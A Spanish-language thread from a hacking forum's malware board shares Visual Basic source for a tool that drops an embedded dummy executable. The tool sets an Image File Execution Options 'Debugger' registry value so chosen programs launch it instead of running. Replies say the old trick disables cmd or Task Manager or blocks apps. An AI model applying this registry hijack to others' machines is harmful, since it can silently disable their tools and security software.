Foro de elhacker.net

Aquí dejo el source completo del programa iFEO.exe del que he hablado en este post original:

[Método] - iFEO bug (Image File Execution Options) (http://foro.elhacker.net/analisis_y_diseno_de_malware/metodo_ifeo_bug_image_file_execution_options-t249670.0.html#msg1203340)

Aquí esta el source del programa, el módulo principal:

Function DropDummy(ByVal ThePath As String) As Boolean
    On Error Resume Next
 
    File = ""
    File = File & "4D5A0000504500004C0101006A2A58C3z8z040003010B01080001"
    File = File & "000080z4z79z3z0Cz3z79z3z0Cz5z400004z3z04z3z74z3z20z3z"
    File = File & "04z7z0401000088z7z02z19z4B45524E454C33322E646C6Cz4z38"
 
    i = 1
    Tmp = ""
    While i <= Len(File)
        If Mid(File, i, 1) = "z" Then
            a = i + 1
            k = 0
            While Mid(File, a, 1) <> "z"
                k = k * 10 + Mid(File, a, 1)
                a = a + 1
            Wend
            i = a + 1
            For a = 1 To k
                Tmp = Tmp + "00"
            Next
        ElseIf Mid(File, i, 1) <> "z" Then
            Tmp = Tmp & Mid(File, i, 2)
            i = i + 2
        End If
    Wend
 
    Set hFSO = CreateObject("Scripting.FileSystemObject")
    Set hFile = hFSO.CreateTextFile(ThePath, ForWriting)
    i = 1
    While i < Len(Tmp)
        File = Int("&H" & Mid(Tmp, i, 2))
        hFile.Write (Chr(File))
        i = i + 2
    Wend
    hFile.Close
    DoEvents
    DropDummy = True
End Function
 
Function AddFileName(ByVal fName As String, ByVal DummyFile As String)
    On Error Resume Next
    Set WShell = CreateObject("WScript.Shell")
    WShell.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\" & fName & "\Debugger", Chr(34) & UCase(DummyFile) & Chr(34)
End Function
 
Function DelFileName(ByVal fName As String)
    On Error Resume Next
    Set WShell = CreateObject("WScript.Shell")
    WShell.RegDelete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\" & fName & "\Debugger"
End Function
 

Y su descarga completa:

http://cactus-software.elhacker.net/iFEO Bug.zip (http://cactus-software.elhacker.net/iFEO Bug.zip)

Saludos!!

Hola, muy interesante por lo que lei en el post original la verdad yo tambien desconosia esto, lo prove y funciona muy bien, ¿que se supone que esta haciendo el codigo para que llame al dumpy.exe lo marca como el Debugger iexplorer?

Saludos.

Buen aporte Mad y gracias, pero...

como dicen los conocedores del foro, ya se viene manejando esa herramienta desde tiempo atrás, y tienes razón, muchos lo conocen pero tantos más lo desconocen.
Mi opinion es que las herramientas son creadas para una finalidad, pero realmente terminan siendo un abanico de posibilidades, ejmplo:
Este code con un poco de imaginacion, se puede implementar para seguridad más que para joder gente, y de pronto me viene a la mente, bloquear aplicaciones como el msn, y agregarle un modulito que hice para que se ejecute como usuario System  ;D

es bastante viejo, este metodo tambien se usa para deshabilitar el cmd, task, etc. :rolleyes:

Tal vez el método sea viejo, pero yo por lo menos no lo conocía, gracias por el aporte.

PD: El viento tambien es viejo y cada vez sopla mas.

Saludos

Cierto, lo que pasa es como lo dijeron "Era un secreto que iba de boca en boca" :xD